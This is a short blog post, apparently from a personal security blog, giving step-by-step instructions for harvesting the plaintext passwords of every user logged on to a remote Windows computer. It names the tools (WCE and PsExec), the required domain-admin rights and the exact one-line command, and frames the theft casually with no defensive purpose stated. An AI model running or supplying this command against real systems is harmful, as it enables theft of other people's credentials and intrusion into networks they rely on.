In a previous post, I explained how to set up a scheduled task to nab a logging-on user's password. I said that you could kick them off their session if you wanted to use that technique when they log on again, but getting their password if they're already logged in is probably easier.
To start, you'll need WCE and PsExec. Open an elevated command prompt with permissions on the target computer (typically domain admin). Navigate to the directory containing WCE and PsExec, then type this command:
psexec \\target -s -c -f wce -w
Replace "target" with the name of the remote computer containing the user's session.
The WCE output, including the plaintext passwords of all logged-on users, will be delivered to your console in a second. That was easy!
No comments:
Post a Comment